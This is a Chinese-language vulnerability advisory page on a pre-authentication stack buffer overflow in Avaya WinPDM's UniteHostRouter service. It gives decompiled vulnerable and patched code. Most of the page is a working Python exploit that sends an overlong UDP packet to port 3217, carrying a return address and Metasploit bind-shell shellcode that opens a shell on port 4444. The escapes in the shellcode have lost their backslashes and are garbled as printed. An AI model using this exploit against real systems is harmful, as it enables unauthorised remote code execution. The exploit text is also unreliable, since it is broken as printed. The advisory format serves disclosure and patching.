发布日期:2011-05-24
更新日期:2012-10-11受影响系统:
AVAYA AvayaWinPDM 3.8.2
不受影响系统:
AVAYA AvayaWinPDM 3.8.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 47947AvayaWinPDM是用于配置 Avaya IP DECT 电话的应用。AvayaWinPDM 3.8.5之前版本存在安全漏洞,可允许远程攻击者在应用的上下文中执行任意代码。<*来源:Abdul-Aziz Hariri
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# Abysssec Public Exploit
# more info www.abysssec.com
# Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute#A boundary error in the Unite Host Router service (UniteHostRouter.exe)
#when processing certain requests can be exploited to cause a stack-based buffer
#overflow via an overly long string in the "To:" field sent to UDP port 3217.
"""
signed int __cdecl sub_403160(const char *Str, void *a2)
{
char *v2;
char *v3;
const void *v4;
char *v5;
unsigned int v6;
signed int result; v2 = strpbrk(Str, "
");
v3 = strpbrk(Str, "/
");
if ( v3 >= v2 || (v4 = v3 + 1, v5 = strpbrk(v3 + 1, ":/?
"), v5 > v2) )
{
result = 0;
}
else
{
v6 = v5 - v4;
memcpy(a2, v4, v6); // vulnerable memcpy
*((_BYTE *)a2 + v6) = 0;
result = 1;
}
return result;
} signed int __cdecl sub_403160_patched(const char *Str, void *a2)
{
char *v2;
char *v3;
const void *v4;
char *v5;
unsigned int v6;
signed int result; v2 = strpbrk(Str, "
");
if ( v2
&& (v3 = strpbrk(Str, "/
")) != 0
&& v3 < v2
&& (v4 = v3 + 1, (v5 = strpbrk(v3 + 1, ":/?
")) != 0)
&& v5 <= v2
&& (v6 = v5 - v4, (signed int)v6 <= 256) ) // patched by checking <= 256
{
memcpy(a2, v4, v6);
*((_BYTE *)a2 + v6) = 0;
result = 1;
}
else
{
result = 0;
}
return result;
}
"""from socket import socket, AF_INET, SOCK_DGRAMdata = "x55x54x50x2fx31" # Protocol
data +=" To: 127.0.0.1"
data+= " /"+"A"*260
data+= "xFBxF8xABx71" # 71ABF8FB call esp W32_SOCK.dll# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
# http://metasploit.comdata += ("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
"x4fx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58"
"x4ex56x46x32x46x32x4bx38x45x44x4ex43x4bx58x4ex47"
"x45x50x4ax57x41x50x4fx4ex4bx38x4fx34x4ax41x4bx58"
"x4fx55x42x52x41x30x4bx4ex43x4ex42x53x49x54x4bx38"
"x46x53x4bx58x41x30x50x4ex41x33x42x4cx49x39x4ex4a"
"x46x58x42x4cx46x57x47x30x41x4cx4cx4cx4dx50x41x30"
"x44x4cx4bx4ex46x4fx4bx33x46x55x46x42x4ax42x45x57"
"x43x4ex4bx58x4fx55x46x52x41x50x4bx4ex48x36x4bx58"
"x4ex50x4bx34x4bx48x4fx55x4ex41x41x30x4bx4ex43x30"
"x4ex52x4bx48x49x38x4ex36x46x42x4ex41x41x56x43x4c"
"x41x43x42x4cx46x46x4bx48x42x54x42x33x4bx58x42x44"
"x4ex50x4bx38x42x47x4ex41x4dx4ax4bx48x42x54x4ax50"
"x50x35x4ax46x50x58x50x44x50x50x4ex4ex42x35x4fx4f"
"x48x4dx41x53x4bx4dx48x36x43x55x48x56x4ax36x43x33"
"x44x33x4ax56x47x47x43x47x44x33x4fx55x46x55x4fx4f"
"x42x4dx4ax56x4bx4cx4dx4ex4ex4fx4bx53x42x45x4fx4f"
"x48x4dx4fx35x49x48x45x4ex48x56x41x48x4dx4ex4ax50"
"x44x30x45x55x4cx46x44x50x4fx4fx42x4dx4ax36x49x4d"
"x49x50x45x4fx4dx4ax47x55x4fx4fx48x4dx43x45x43x45"
"x43x55x43x55x43x45x43x34x43x45x43x34x43x35x4fx4f"
"x42x4dx48x56x4ax56x41x41x4ex35x48x36x43x35x49x38"
"x41x4ex45x49x4ax46x46x4ax4cx51x42x57x47x4cx47x55"
"x4fx4fx48x4dx4cx36x42x31x41x45x45x35x4fx4fx42x4d"
"x4ax36x46x4ax4dx4ax50x42x49x4ex47x55x4fx4fx48x4d"
"x43x35x45x35x4fx4fx42x4dx4ax36x45x4ex49x44x48x38"
"x49x54x47x55x4fx4fx48x4dx42x55x46x35x46x45x45x35"
"x4fx4fx42x4dx43x49x4ax56x47x4ex49x37x48x4cx49x37"
"x47x45x4fx4fx48x4dx45x55x4fx4fx42x4dx48x36x4cx56"
"x46x46x48x36x4ax46x43x56x4dx56x49x38x45x4ex4cx56"
"x42x55x49x55x49x52x4ex4cx49x48x47x4ex4cx36x46x54"
"x49x58x44x4ex41x43x42x4cx43x4fx4cx4ax50x4fx44x54"
"x4dx32x50x4fx44x54x4ex52x43x49x4dx58x4cx47x4ax53"
"x4bx4ax4bx4ax4bx4ax4ax46x44x57x50x4fx43x4bx48x51"
"x4fx4fx45x57x46x54x4fx4fx48x4dx4bx45x47x35x44x35"
"x41x35x41x55x41x35x4cx46x41x50x41x35x41x45x45x35"
"x41x45x4fx4fx42x4dx4ax56x4dx4ax49x4dx45x30x50x4c"
"x43x35x4fx4fx48x4dx4cx56x4fx4fx4fx4fx47x33x4fx4f"
"x42x4dx4bx58x47x45x4ex4fx43x38x46x4cx46x36x4fx4f"
"x48x4dx44x55x4fx4fx42x4dx4ax36x4fx4ex50x4cx42x4e"
"x42x36x43x55x4fx4fx48x4dx4fx4fx42x4dx5a")data += "
" #
port = 3217
hostname = "192.168.171.129"
udp = socket(AF_INET,SOCK_DGRAM)
udp.sendto(data, (hostname, port))print "Send malicius packet
"
print "You Should Got a shell at %s 4444" % hostname建议:
--------------------------------------------------------------------------------
厂商补丁:AVAYA
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://support.avaya.com/security/phpPaleo "lang"参数本地文件包含漏洞OpenStack Swift "loads()"任意代码执行漏洞相关资讯 缓冲区溢出漏洞 AvayaWinPDM安全漏洞 AvayaWinPDM
- Novell iPrint Client 缓冲区溢出 (05/04/2013 07:13:08)
- Siemens WinCC CCEServer缓冲区溢 (03/22/2013 19:25:09)
- EMC AlphaStor DCP缓冲区溢出漏洞 (02/05/2013 09:14:34)
| - Siemens WinCC RegReader ActiveX (03/24/2013 08:07:04)
- Novell Messenger / Groupwise (03/18/2013 20:58:20)
- GNU Coreutils ‘sort’Text (02/02/2013 07:27:30)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您
|
易网时代-编程资源站